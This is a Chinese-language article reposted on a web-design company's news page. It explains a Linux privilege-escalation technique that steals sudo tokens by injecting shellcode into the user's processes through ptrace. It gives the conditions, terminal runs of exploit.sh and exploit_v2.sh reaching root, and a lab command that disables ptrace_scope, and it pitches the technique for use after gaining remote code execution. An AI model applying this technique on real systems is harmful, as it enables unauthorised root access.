小編給大家分享一下linux中如何利用sudo token實(shí)現(xiàn)提權(quán),希望大家閱讀完這篇文章之后都有所收獲,下面讓我們一起去探討吧!
“專業(yè)、務(wù)實(shí)、高效、創(chuàng)新、把客戶的事當(dāng)成自己的事”是我們每一個(gè)人一直以來堅(jiān)持追求的企業(yè)文化。 創(chuàng)新互聯(lián)建站是您可以信賴的網(wǎng)站建設(shè)服務(wù)商、專業(yè)的互聯(lián)網(wǎng)服務(wù)提供商! 專注于做網(wǎng)站、成都網(wǎng)站設(shè)計(jì)、軟件開發(fā)、設(shè)計(jì)服務(wù)業(yè)務(wù)。我們始終堅(jiān)持以客戶需求為導(dǎo)向,結(jié)合用戶體驗(yàn)與視覺傳達(dá),提供有針對性的項(xiàng)目解決方案,提供專業(yè)性的建議,創(chuàng)新互聯(lián)建站將不斷地超越自我,追逐市場,引領(lǐng)市場!
$sudo whatever [sudo]password for user: # Press<ctrl>+c since you don't have the password. # This creates an invalidsudo tokens. $ sh exploit.sh ....wait 1 seconds $sudo -i # no password required :) # id uid=0(root)gid=0(root) groups=0(root)
1、 完全啟用Ptrace(/proc/sys/kernel/yama/ptrace_scope == 0);
2、 當(dāng)前用戶必須開啟一個(gè)擁有有效sudo令牌并且相同uid的活動(dòng)進(jìn)程;
注:默認(rèn)密碼的超時(shí)時(shí)間為15分鐘,如果你在15分鐘內(nèi)使用sudo兩次,系統(tǒng)就不會要求你再輸入用戶的sudo密碼了。
項(xiàng)目目錄中的Exploit.sh會向當(dāng)前用戶的所有進(jìn)程注入Shell代碼,并使用它們的sudo令牌來驗(yàn)證我們自己的sudo口令。僅需三行Shell代碼,一切皆有可能。
假設(shè),你拿到了一個(gè)RCE,而且沒有用戶密碼,但目標(biāo)用戶使用了sudo,那么你就可以通過竊取他的sudo令牌來實(shí)現(xiàn)提權(quán)啦!
如何在實(shí)驗(yàn)環(huán)境中模擬?
#echo 0 > /proc/sys/kernel/yama/ptrace_scope # #Don't worry this is not persistent accross reboot
打開兩個(gè)終端窗口:
1、 其中一個(gè)執(zhí)行sudo命令,然后輸入正確的用戶密(sudo ls);
2、 另一個(gè)按照上述方法執(zhí)行漏洞利用代碼;
如果exploit_v1無法成功的話,大家可以嘗試一下exploit_v2.sh:
$./exploit_v2.sh Currentprocess : 2441 chmod:changing permissions of 'activate_sudo_token': Operation not permitted Injectingprocess 1721 -> bash Injectingprocess 2433 -> bash cat:/proc/2446/comm: No such file or directory Injectingprocess 2446 -> $/tmp/sh -p # id uid=1001(test)gid=1001(test) euid=0(root) egid=0(root) groups=0(root),1001(test)
看完了這篇文章,相信你對“l(fā)inux中如何利用sudo token實(shí)現(xiàn)提權(quán)”有了一定的了解,如果想了解更多相關(guān)知識,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝各位的閱讀!
新聞名稱:linux中如何利用sudotoken實(shí)現(xiàn)提權(quán)
網(wǎng)站地址:http://www.chinadenli.net/article32/joigsc.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站維護(hù)、Google、定制網(wǎng)站、網(wǎng)站制作、營銷型網(wǎng)站建設(shè)、自適應(yīng)網(wǎng)站
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)